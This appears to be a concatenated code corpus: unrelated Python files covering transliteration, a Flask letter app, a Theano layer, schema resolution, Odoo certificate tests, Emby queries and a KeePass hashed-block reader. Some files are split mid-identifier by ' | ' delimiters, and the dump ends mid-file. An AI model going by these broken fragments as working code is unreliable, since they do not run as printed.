table = _AlphabetToSLP1(_ITRANS_ALPHABET)
alternatives = [('aa', 'A'), ('ii', 'I'), ('uu', 'U'), ('RRi', 'R^i'),
('RRI', 'R^I'), ('LLi', 'L^i'), ('LLI', 'L^I'),
('~N', 'N^'), ('~n', 'JN'), ('v', 'w')]
for (letter, alternative) in alternatives:
table[alternative] = table[letter]
return transliterator.MakeStateMachine(table)
_ITRANS_TO_SLP1_STATE_MACHINE = _ITRANSToSLP1StateMachine()
_MANGLED_DEVANAGARI_TO_SLP1_STATE_MACHINE = transliterator.MakeStateMachine(
_AlphabetToSLP1(devanagari.Alphabet()))
def _TransliterateDevanagari(text):
return transliterator.Transliterate(_MANGLED_DEVANAGARI_TO_SLP1_STATE_MACHINE,
devanagari.Mangle(text),
_DEFAULT_PASS_THROUGH)
def _IsoToIast(text):
text = text.replace('ṁ', 'ṃ')
text = text.replace('ē', 'e')
text = text.replace('ō', 'o')
text = text.replace('r̥̄', 'ṝ')
text = text.replace('r̥', 'ṛ')
text = text.replace('l̥̄', 'ḹ')
text = text.replace('l̥', 'ḷ')
return text
def _FixBadDevanagari(text):
# TODO(shreevatsa): Warn about these "wrong" characters.
text = text.replace('ऎ', 'ए')
text = text.replace('ऒ', 'ओ')
text = text.replace('ॆ', 'े')
text = text.replace('ॊ', 'ो')
text = text.replace('ळ', 'ल')
text = text.replace('ॐ', 'ओं')
text = text.replace(u'\u1CF2', 'ः') # VEDIC SIGN ARDHAVISARGA
text = text.replace(u'\u1CF3', 'ः') # VEDIC SIGN ROTATED ARDHAVISARGA
text = text.replace(u'\u1CF5', 'ः') # VEDIC SIGN JIHVAMULIYA
text = text.replace(u'\u1CF6', 'ः') # VEDIC SIGN UPADHMANIYA
return text
_KANNADA_VOWEL_SIGNS = 'ಕಾ ಕಿ ಕೀ ಕು ಕೂ ಕೃ ಕೄ ಕೆ ಕೇ ಕೈ ಕೊ ಕೋ ಕೌ ಕಂ ಕಃ ಕ್'
_KANNADA_VOWEL_SIGNS = ''.join(_KANNADA_VOWEL_SIGNS[i]
for i in range(len(_KANNADA_VOWEL_SIGNS))
if i % 3 == 1)
_DEVANAGARI_VOWEL_SIGNS = 'का कि की कु कू कृ कॄ कॆ के कै कॊ को कौ कं कः क्'
_DEVANAGARI_VOWEL_SIGNS = ''.join(_DEVANAGARI_VOWEL_SIGNS[i]
for i in range(len(_DEVANAGARI_VOWEL_SIGNS))
if i % 3 == 1)
_DEVANAGARI_CONSONANTS = 'कखगघङचछजझञटठडढणतथदधनपफबभमयरलवशषसहळरळ'
_KANNADA_VOWELS = 'ಅಆಇಈಉಊಋೠಎಏಐಒಓಔ'
_DEVANAGARI_VOWELS = 'अआइईउऊऋॠऎएऐऒओऔ'
_KANNADA_AV = 'ಅಂ ಅಃ'
_KANNADA_AV = ''.join(_KANNADA_AV[i]
for i in range(len(_KANNADA_AV)) if i % 3 == 1)
_DEVANAGARI_AV = 'अं अः'
_DEVANAGARI_AV = ''.join(_DEVANAGARI_AV[i]
for i in range(len(_DEVANAGARI_AV)) if i % 3 == 1)
_KANNADA_TO_DEVANAGARI = transliterator.MakeStateMachine(dict(zip(
_KANNADA_VOWELS + _KANNADA_AV + KANNADA_CONSONANTS + _KANNADA_VOWEL_SIGNS,
_DEVANAGARI_VOWELS + _DEVANAGARI_AV + _DEVANAGARI_CONSONANTS +
_DEVANAGARI_VOWEL_SIGNS)))
def KannadaToDevanagari(text):
return transliterator.Transliterate(_KANNADA_TO_DEVANAGARI, text,
pass_through=_DEFAULT_PASS_THROUGH)[0]
def TransliterateFrom(input_text, input_scheme, pass_through=None):
"""Transliterates text to SLP1, after being told what script it is."""
input_text = _IsoToIast(input_text)
def ForKannada(text):
text = KannadaToDevanagari(text)
text = _FixBadDevanagari(text)
text = text.replace('s', 'ऽ')
return _TransliterateDevanagari(text)
actions = {
TRANSLITERATION_SCHEME.Kannada: ForKannada,
TRANSLITERATION_SCHEME.Devanagari:
lambda text: _TransliterateDevanagari(text),
TRANSLITERATION_SCHEME.IAST:
lambda text: transliterator.Transliterate(_IAST_TO_SLP1_STATE_MACHINE, text, pass_through),
TRANSLITERATION_SCHEME.ITRANS:
lambda text: transliterator.Transliterate(_ITRANS_TO_SLP1_STATE_MACHINE, text, pass_through),
TRANSLITERATION_SCHEME.HK:
lambda text: transliterator.Transliterate(_HK_TO_SLP1_STATE_MACHINE, text, pass_through)}
return actions[input_scheme](input_text)
_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE = transliterator.MakeStateMachine(
_SLP1ToAlphabet(devanagari.Alphabet()))
def _CleanSLP1ToDevanagari(text):
(text, unparsed) = transliterator.Transliterate(_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE, text,
pass_through=_DEFAULT_PASS_THROUGH)
assert not unparsed, (text, unparsed)
assert isinstance(text, unicode), text
return devanagari.UnMangle(text)
def TransliterateForOutput(text):
iast = transliterator.Transliterate(_SLP1_TO_IAST_STATE_MACHINE, text,
pass_through=_DEFAULT_PASS_THROUGH)[0]
deva = _CleanSLP1ToDevanagari(text)
return '%s (%s)' % (iast, deva)
def AddDevanagariToIast(iast):
"""Given IAST text, include the Devanagari transliteration in brackets."""
stray = ' ()/' # Non-IAST characters that appear in metre names
slp_text = transliterator.Transliterate(_IAST_TO_SLP1_STATE_MACHINE, iast, pass_through=stray)[0]
(deva, unparsed) = transliterator.Transliterate(_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE,
slp_text, pass_through=stray)
assert not unparsed, (deva, unparsed)
assert isinstance(deva, unicode), deva
deva = devanagari.UnMangle(deva)
return '%s (%s)' % (iast, deva)
def TransliterateForTable(text):
return transliterator.Transliterate(_SLP1_TO_IAST_STATE_MACHINE, text,
|
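# Every table above is fed to `transliterator.MakeStateMachine`, i.e. a
# longest-match mapping over multi-character tokens ('ai', 'kh', ...). A
# self-contained greedy sketch of that idea (not the module's actual state
# machine, which additionally reports unparsed characters):
def translit(text, table, pass_through=' '):
    out, i, maxlen = [], 0, max(len(k) for k in table)
    while i < len(text):
        for width in range(min(maxlen, len(text) - i), 0, -1):
            chunk = text[i:i + width]
            if chunk in table:             # longest match wins
                out.append(table[chunk])
                i += width
                break
        else:
            if text[i] in pass_through:    # keep whitelisted characters
                out.append(text[i])
            i += 1                         # skip anything unmapped
    return ''.join(out)
assert translit('kha ga', {'kh': 'K', 'g': 'g', 'a': 'a'}) == 'Ka ga'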
Coderhypo/namiya | nayami/route/post.py | Python | apache-2.0 | 3,039 | 0.000329 | from flask import render_template, request, abort, redirect, url_for
from datetime import datetime
from nayami.common.app import app
from nayami.common.auth import user_auth
from nayami.model.post import Post
@app.route('/', methods=['GET'])
def index_page():
return render_template('index.html')
@app.route('/p/<post_id>', methods=['GET', 'POST'])
def get_post_page(post_id):
if request.method == 'GET':
return render_template('post/need_email.html', post_id=post_id)
email = request.form.get("email")
post = Post.get_post_by_id(post_id)
if not post or post.reply_email != email:
recipient = post.recipient if post else u'John Winston Lennon'
return render_template('post/need_email.html', post_id=post_id, recipient=recipient)
post.read()
return render_template('post/post.html', post=post)
@app.route('/post', methods=['GET', 'POST'])
@user_auth
def create_post_page():
if request.method == 'GET':
return render_template('post/create_post.html')
if request.method == 'POST':
content = request.form.get("content")
sender = request.form.get("sender")
sender_email = request.form.get("sender_email")
post = Post.create_post(sender, sender_email, content)
assert post.id
return redirect(url_for("mail_box_page"))
@app.route('/mailbox', methods=['GET'])
@user_auth
def mail_box_page():
posts = Post.get_all_unanswered_post()
return render_template('mailbox.html', posts=posts)
@app.route('/milkbox', methods=['GET'])
@user_auth
def milk_box_page():
posts = Post.get_all_replies()
return render_template('milkbox/list.html', posts=posts)
@app.route('/backdoor', methods=['GET', 'POST'])
@user_auth
def back_door_page():
now = datetime.now().hour
from nayami.config import TEST
if not TEST and 8 < now < 22:
return render_template('backdoor/help.html')
if request.method == 'GET':
need = request.args.get('need')
if need == 'true':
post = Post.get_rand_unanswered_post()
if post:
return render_template('backdoor/reply_post.html', post=post)
post_id = request.args.get("p")
post = Post.get_post_by_id(post_id) if post_id else None
if post and not post.from_namiya:
post.read() |
return render_template('backdoor/reply_post.html', post=post)
posts = Post.get_all_unanswered_post()
return render_template('backdoor/list.html', posts=posts)
if request.method == 'POST':
| post_id = request.form.get("post_id")
content = request.form.get("content")
sender_email = request.form.get("sender_email")
post = Post.get_post_by_id(post_id)
if post:
post.reply(sender_email, content)
return redirect(url_for("back_door_page"))
@app.route('/<page_name>', methods=['GET'])
def other_page(page_name):
if page_name in ['help']:
return render_template('page/%s.html' % page_name)
abort(404)
|
zomux/deepy | deepy/layers/softmax3d.py | Python | mit | 409 | 0.00489 | # | !/usr/bin/env python
# -*- coding: utf-8 -*-
from layer import NeuralLayer
import theano
import theano.tensor as T
class Softmax3D(NeuralLayer):
def __init__(self):
super(Softmax3D, self).__init__("softmax")
def compute_tensor(self, x):
shape = x.shape
x = x.reshape((-1, shape[-1]))
softmax_tensor = T.nnet.softmax(x)
return softmax_tenso | r.reshape(shape) |
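# `Softmax3D` above applies a row softmax over the last axis of an N-d
# tensor by flattening to 2-D and restoring the shape afterwards. The same
# trick in NumPy (sketch, with the usual max-subtraction for stability):
import numpy as np
def softmax_lastaxis(x):
    shape = x.shape
    flat = x.reshape(-1, shape[-1])
    e = np.exp(flat - flat.max(axis=1, keepdims=True))
    return (e / e.sum(axis=1, keepdims=True)).reshape(shape)
x = np.random.randn(2, 3, 4)
assert np.allclose(softmax_lastaxis(x).sum(axis=-1), 1.0)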
MD-Studio/MDStudio | mdstudio/mdstudio/api/schema.py | Python | apache-2.0 | 9,728 | 0.002673 | import json
import jsonschema
import os
import re
import six
from jsonschema import FormatChecker, Draft4Validator
from mdstudio.api.exception import RegisterException
from mdstudio.api.singleton import Singleton
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
# python 2 compat
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
class ISchema(object):
def __init__(self):
self.cached = {}
def _retrieve_local(self, base_path, schema_path, versions=None):
if versions is not None:
if not isinstance(versions, (list, set)):
versions = [versions]
for version in versions:
path = os.path.join(base_path, '{}.v{}.json'.format(schema_path, version))
with open(path, 'r') as f:
self.cached[version] = json.load(f)
else:
path = os.path.join(base_path, '{}.json'.format(schema_path))
with open(path, 'r') as f:
self.cached[1] = json.load(f)
@chainable
def _recurse_subschemas(self, schema, session):
success = True
if isinstance(schema, dict):
ref = schema.pop('$ref', None)
if ref:
ref_decomposition = re.match(r'(\w+)://(.+)', ref)
if not ref_decomposition:
raise RegisterException('$ref value in the schema must hold a valid resource uri. This may be given as '
'resource://<uri>, endpoint://<uri>, or https://<url>, you specified "{}"'.format(ref))
subschema = self._schema_factory(ref_decomposition.group(1), ref_decomposition.group(2))
if (yield subschema.flatten(session)):
schema.update(subschema.to_schema())
else:
success = False
if success:
for k, v in schema.items():
recursed = yield self._recurse_subschemas(v, session)
if not recursed['success']:
success = False
break
schema[k] = recursed['schema']
elif isinstance(schema, list):
for v in schema:
success = success and (yield self._recurse_subschemas(v, session))['success']
return_value({
'schema': schema,
'success': success
})
@staticmethod
def _schema_factory(schema_type, schema_path):
factory_dict = {
'resource': ResourceSchema,
'mdstudio': MDStudioSchema,
'endpoint': EndpointSchema,
'https': HttpsSchema,
'http': HttpsSchema
}
if schema_type not in factory_dict:
raise RegisterException('You tried to specify an unknown schema type. '
'Valid schemas are resource://<uri>, endpoint://<uri> and https://<url>. '
'We got "{}" as schema type'.format(schema_type))
return factory_dict[schema_type](schema_path)
def to_schema(self):
if not self.cached:
raise NotImplementedError("This schema has not been or could not be retrieved.")
if len(self.cached) > 1:
return {
'oneOf': list(self.cached.values())
}
else:
return six.next(six.itervalues(self.cached))
class InlineSchema(ISchema):
def __init__(self, schema):
super(InlineSchema, self).__init__()
self.schema = schema
def flatten(self, session=None):
return self._recurse_subschemas(self.schema, session)
def to_schema(self):
return self.schema
class HttpsSchema(ISchema):
def __init__(self, uri):
super(HttpsSchema, self).__init__()
self.uri = 'https://{}'.format(uri)
def flatten(self, session=None):
return True
def to_schema(self):
return {'$ref': self.uri}
class EndpointSchema(ISchema):
type_name = 'endpoint'
def __init__(self, uri, versions=None):
super(EndpointSchema, self).__init__()
uri_decomposition = re.match(r'([\w/\-_]+?)(/((v?\d+,?)*))?$', uri)
if not uri_decomposition:
raise RegisterException('An {0} schema uri must be in the form "{0}://<schema path>(/v<versions>), '
                                    'where <versions> is a comma separated list of version numbers. Only alphanumeric, and "/_-"'
' characters are supported. We got "endpoint://{1}".'.format(self.type_name, uri))
self.schema_path = uri_decomposition.group(1)
uri_versions = uri_decomposition.group(3)
self.versions = versions or ([int(v) for v in uri_versions.replace('v', '').split(',')] if uri_versions else [1])
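        # e.g. uri "some/path/v1,2" parses to schema_path "some/path" and
        # versions [1, 2]; without a version suffix the default is [1].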
self.schema_subdir = 'endpoints'
@chainable
def flatten(self, session=None):
# type: (CommonSession) -> bool
if self.cached:
return_value(True)
ldir = self.search_dir(session)
if self.schema_subdir:
ldir = os.path.join(ldir, self.schema_subdir)
try:
self._retrieve_local(ldir, self.schema_path, self.versions)
except IOError as ex:
raise RegisterException('Tried to access schema "{}/{}" with versions {}, '
'but the schema was not found:\n{}'.format(ldir, self.schema_path, self.versions, str(ex)))
success = True
for version, schema in self.cached.items():
flattened = yield self._recurse_subschemas(schema, session)
self.cached[version] = flattened['schema']
if not flattened['success']:
success = False
break
if not success:
self.cached = {}
return_value(success)
def search_dir(self, session):
return session.component_schemas_path()
class MDStudioSchema(EndpointSchema):
schema_subdir = None
type_name = 'mdstudio'
class ClaimSchema(EndpointSchema):
type_name = 'claims'
def __init__(self, uri, versions=None):
super(ClaimSchema, self).__init__(uri, versions)
self.schema_subdir = 'claims'
@six.add_metaclass(Singleton)
class MDStudioClaimSchema(object):
def __init__(self, session):
with open(os.path.join(session.mdstudio_schemas_path(), 'claims.v1.json'), 'r') as base_claims_file:
            self.schema = json.load(base_claims_file)
def to_schema(self):
return self.schema
@staticmethod
def flatten(session):
return True
class ResourceSchema(ISchema):
def __init__(self, uri, versions=None):
super(ResourceSchema, self).__init__()
uri_decomposition = re.match(r'([\w\-_]+)/([\w\-_]+)/([\w/\-_]+?)(/((v?\d+,?)*))?$', uri)
if not uri_decomposition:
raise RegisterException(
                'A resource schema uri must be in the form "resource://<vendor>/<component>/<schema path>(/v<versions>), '
                'where <versions> is a comma separated list of version numbers. Only alphanumeric, and "/_-" characters are supported. '
'We got "resource://{}".'.format(uri))
self.vendor = uri_decomposition.group(1)
self.component = uri_decomposition.group(2)
self.schema_path = uri_decomposition.group(3)
uri_versions = uri_decomposition.group(5)
self.versions = versions or ([int(v) for v in uri_versions.replace('v', '').split(',')] if uri_versions else [1])
@chainable
def flatten(self, session=None):
# type: (CommonSession) -> bool
if self.cached:
return_value(True)
if session.component_config.static.vendor == self.vendor and session.component_config.static.component == self.component:
self._retrieve_local(os.path.join(session.component_schemas_path(), 'resources'), self.schema_path, self.versions)
else:
yield self._retrieve_wamp(session)
success = True
        for version, schema in self.cached.items():
OCA/l10n-brazil | l10n_br_fiscal/tests/test_certificate.py | Python | agpl-3.0 | 4,074 | 0 | # Copyright 2019 Akretion - Renato Lima <renato.lima@akretion.com.br>
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from datetime import timedelta
from odoo import fields
from odoo.exceptions import ValidationError
from odoo.tests import common
from odoo.tools.misc import format_date
from ..tools import misc
class TestCertificate(common.TransactionCase):
def setUp(self):
super().setUp()
self.company_model = self.env["res.company"]
self.certificate_model = self.env["l10n_br_fiscal.certificate"]
        self.company = self._create_company()
self._switch_user_company(self.env.user, self.company)
self.cert_country = "BR"
self.cert_issuer_a = "EMISSOR A TESTE"
self.cert_issuer_b = "EMISSOR B TESTE"
self.cert_subject_valid = "CERTIFICADO VALIDO TESTE"
self.cert_date_exp = fields.Datetime.today() + timedelta(days=365)
self.cert_subject_invalid = "CERTIFICADO INVALIDO TESTE"
self.cert_passwd = "123456"
self.cert_name = "{} - {} - {} - Valid: {}".format(
"NF-E",
"A1",
self.cert_subject_valid,
format_date(self.env, self.cert_date_exp),
)
self.certificate_valid = misc.create_fake_certificate_file(
valid=True,
passwd=self.cert_passwd,
issuer=self.cert_issuer_a,
country=self.cert_country,
subject=self.cert_subject_valid,
)
self.certificate_invalid = misc.create_fake_certificate_file(
valid=False,
passwd=self.cert_passwd,
issuer=self.cert_issuer_b,
country=self.cert_country,
subject=self.cert_subject_invalid,
)
    def _create_company(self):
"""Creating a company"""
company = self.env["res.company"].create(
{
"name": "Company Test Fiscal BR",
"cnpj_cpf": "42.245.642/0001-09",
"country_id": self.env.ref("base.br").id,
"state_id": self.env.ref("base.state_br_sp").id,
}
)
return company
def _switch_user_company(self, user, company):
""" Add a company to the user's allowed & set to current. """
user.write(
{
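                # Odoo many2many command: (6, 0, ids) replaces the whole
                # set of linked records with exactly `ids`.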
"company_ids": [(6, 0, (company + user.company_ids).ids)],
"company_id": company.id,
}
)
def test_valid_certificate(self):
"""Create and check a valid certificate"""
cert = self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": self.cert_passwd,
"file": self.certificate_valid,
}
)
self.assertEqual(cert.issuer_name, self.cert_issuer_a)
self.assertEqual(cert.owner_name, self.cert_subject_valid)
        self.assertEqual(cert.date_expiration.year, self.cert_date_exp.year)
self.assertEqual(cert.date_expiration.month, self.cert_date_exp.month)
self.assertEqual(cert.date_expiration.day, self.cert_date_exp.day)
self.assertEqual(cert.name, self.cert_name)
self.assertEqual(cert.is_valid, True)
def test_certificate_wrong_password(self):
"""Write a valid certificate with wron | g password"""
with self.assertRaises(ValidationError):
self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": "INVALID",
"file": self.certificate_valid,
}
)
def test_invalid_certificate(self):
"""Create and check a invalid certificate"""
with self.assertRaises(ValidationError):
self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": self.cert_passwd,
"file": self.certificate_invalid,
}
)
|
goofwear/Emby.Kodi | resources/lib/ReadEmbyDB.py | Python | gpl-2.0 | 15,756 | 0.008314 | # -*- coding: utf-8 -*-
#################################################################################################
# ReadEmbyDB
#################################################################################################
from DownloadUtils import DownloadUtils
class ReadEmbyDB():
doUtils = DownloadUtils()
urllimit = 50
def filterbyId(self, result, itemList = []):
newResult = []
for item in result:
if item['Id'] in itemList:
newResult.append(item)
return newResult
def getMovies(self, parentId, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?ParentId=%s&SortBy=SortName&Fields=CumulativeRunTimeTicks,Etag&Recursive=true&SortOrder=Descending&IncludeItemTypes=Movie&CollapseBoxSetItems=false&ImageTypeLimit=1&format=json" % parentId
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicVideos(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/items?&SortBy=SortName&Fields=CumulativeRunTimeTicks,Etag&Recursive=true&SortOrder=Descending&IncludeItemTypes=MusicVideo&CollapseBoxSetItems=false&ImageTypeLimit=1&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicArtists(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/Artists?Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicArtistsTotal(self):
result = []
url = "{server}/Artists?Limit=1&Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/Artists?StartIndex=%s&Limit=%s&Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
result.extend(jsondata['Items'])
index += jump
return result
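    # Editorial sketch (hypothetical helper, not in the original class): the
    # StartIndex/Limit paging loop repeated by the *Total methods could be
    # factored out, assuming every endpoint returns 'TotalRecordCount' and
    # 'Items' the same way and the template carries two %s slots.
    def _page_through(self, url_template, jump=200):
        jsondata = self.doUtils.downloadUrl(url_template % (0, 1))
        total = jsondata['TotalRecordCount']
        result = []
        index = 1
        while index < total:
            jsondata = self.doUtils.downloadUrl(url_template % (index, jump))
            result.extend(jsondata['Items'])
            index += jump
        return result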
def getMusicSongs(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
| except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
                result = self.filterbyId(result, itemList)
return result
def getMusicSongsTotal(self):
result = []
url = "{server}/mediabrowser/Users/{UserId}/Items?Index=1&Limit=1&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/mediabrowser/Users/{UserId}/Items?StartIndex=%s&Limit=%s&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
result.extend(jsondata['Items'])
index += jump
return result
def getMusicAlbums(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=MusicAlbum&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else:
tempresult = []
# Only return valid albums - which have artists
for item in result:
if item['AlbumArtists']:
tempresult.append(item)
result = tempresult
# If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicAlbumsTotal(self):
result = []
url = "{server}/mediabrowser/Users/{UserId}/Items?Limit=1&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=MusicAlbum&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/mediabrowser/Users/{UserId}/Items?StartIndex=%s&Limit=%s&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&SortBy=DateCreated&Recursive=true&IncludeItemTypes=MusicAlbum&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
tempresult = []
# Only return valid albums - which have artists
for item in jsondata['Items']:
|
evernym/plenum | plenum/test/msgs.py | Python | apache-2.0 | 572 | 0 | from plenum.common.messages.fields import NonEmptyStringField
from plenum.common.messages.message_base import MessageBase
from plenum.common.messages.node_message_factory import node_message_factory
from plenum.common.util import randomString
def randomMsg():
return TestMsg('subject ' + randomString(),
'content ' + randomString())
class TestMsg(MessageBase):
typename = "TESTMSG"
schema = (
("subject", NonEmptyStringField()),
("cont | ent", NonEmptyStringField()),
)
node_message_factory.set_message_class(TestMsg)
|
nwokeo/supysonic | venv/lib/python2.7/site-packages/storm/zope/metaconfigure.py | Python | agpl-3.0 | 1,225 | 0.000816 | #
# Copyright (c) 2006, 2007 Canonical
#
# Written by Gustavo Niemeyer <gustavo@niemeyer.net>
#
# This file is part of Storm Object Relational Mapper.
#
# Storm is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of
# the License, or (at your option) any later version.
#
# Storm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from zope import component
from storm.zope.interfaces import IZStorm
def set_default_uri(name, uri):
"""Register C{uri} as the default URI for stores called C{name}."""
zstorm = component.getUtility(IZStorm)
zstorm.set_default_uri(name, uri)
def store(_context, name, uri):
_context.action(discriminator=("store", name),
callable=set_default_uri,
args=(name, uri))
|
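# Illustrative usage (assuming the matching directive registration in the
# package's meta.zcml): a ZCML stanza such as
#     <store name="main" uri="sqlite:" />
# queues a configuration action that ends up calling
# set_default_uri("main", "sqlite:").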
AlessandroZ/LaZagne | Windows/lazagne/softwares/memory/libkeepass/hbio.py | Python | lgpl-3.0 | 4,214 | 0.002373 | # -*- coding: utf-8 -*-
import hashlib
import io
import struct
# default from KeePass2 source
BLOCK_LENGTH = 1024 * 1024
try:
file_types = (file, io.IOBase)
except NameError:
file_types = (io.IOBase,)
# HEADER_LENGTH = 4+32+4
def read_int(stream, length):
try:
return struct.unpack('<I', stream.read(length))[0]
except Exception:
return None
class HashedBlockIO(io.BytesIO):
"""
The data is stored in hashed blocks. Each block consists of a block index (4
bytes), the hash (32 bytes) and the block length (4 bytes), followed by the
block data. The block index starts counting at 0. The block hash is a
SHA-256 hash of the block data. A block has a maximum length of
BLOCK_LENGTH, but can be shorter.
Provide a I/O stream containing the hashed block data as the `block_stream`
argument when creating a HashedBlockReader. Alternatively the `bytes`
argument can be used to hand over data as a string/bytearray/etc. The data
is verified upon initialization and an IOError is raised when a hash does
not match.
HashedBlockReader is a subclass of io.BytesIO. The inherited read, seek, ...
functions shall be used to access the verified data.
"""
def __init__(self, block_stream=None, bytes=None):
io.BytesIO.__init__(self)
input_stream = None
if block_stream is not None:
if not (isinstance(block_stream, io.IOBase) or isinstance(block_stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
input_stream = block_stream
elif bytes is not None:
input_stream = io.BytesIO(bytes)
if input_stream is not None:
self.read_block_stream(input_stream)
def read_block_stream(self, block_stream):
"""
        Read the whole block stream into this BytesIO buffer.
"""
if not (isinstance(block_stream, io.IOBase) or isinstance(block_stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
while True:
data = self._next_block(block_stream)
if not self.write(data):
break
self.seek(0)
def _next_block(self, block_stream):
""" |
Read the next block and verify the data.
Raises an IOError if the hash does not match.
"""
index = read_int(block_stream, 4)
bhash = block_stream.read(32)
length = read_int(block_stream, 4)
if length > 0:
data = block_stream.read(length)
if hashlib.sha256(data).digest() == bhash:
return data
else:
| raise IOError('Block hash mismatch error.')
return bytes()
def write_block_stream(self, stream, block_length=BLOCK_LENGTH):
"""
Write all data in this buffer, starting at stream position 0, formatted
in hashed blocks to the given `stream`.
For example, writing data from one file into another as hashed blocks::
# create new hashed block io without input stream or data
hb = HashedBlockIO()
# read from a file, write into the empty hb
with open('sample.dat', 'rb') as infile:
hb.write(infile.read())
# write from the hb into a new file
            with open('hb_sample.dat', 'wb') as outfile:
hb.write_block_stream(outfile)
"""
if not (isinstance(stream, io.IOBase) or isinstance(stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
index = 0
self.seek(0)
while True:
data = self.read(block_length)
if data:
stream.write(struct.pack('<I', index))
stream.write(hashlib.sha256(data).digest())
stream.write(struct.pack('<I', len(data)))
stream.write(data)
index += 1
else:
stream.write(struct.pack('<I', index))
                stream.write(b'\x00' * 32)
stream.write(struct.pack('<I', 0))
break
|
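# Editorial round-trip sketch (not part of the original module): write data
# out as hashed blocks, then read it back through the verifying reader.
if __name__ == "__main__":
    data = b"hello hashed blocks" * 1000
    out = HashedBlockIO()
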